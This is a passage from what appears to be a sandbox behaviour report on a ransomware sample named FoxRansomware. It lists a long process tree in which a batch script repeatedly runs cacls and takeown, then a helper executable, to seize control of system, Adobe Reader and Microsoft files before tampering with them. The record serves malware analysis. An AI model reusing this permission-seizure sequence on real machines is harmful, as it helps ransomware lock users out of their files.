    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab""
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab"
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:4432
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner
    3⤵
    PID:5576
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "device.png" -nobanner
      4⤵
      PID:3656
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4512
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:5604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:3760
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:3808
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:5696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:3788
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:5892
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:5828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5956
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4172
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    - Modifies file permissions
    PID:4276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:1420
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:5880
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:4616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:2152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4884
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:5936
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:5044
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    - Modifies file permissions
    PID:4800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:6004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:1768
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:6088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:4000
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:888
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:4392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:3572
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:2876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:3432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    - Modifies file permissions
    PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:3116
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:3452
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:436
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:3592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:3748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:3440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:3840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:5364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:3304
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4404
- C:\Windows\SysWOW64\cmd.exe
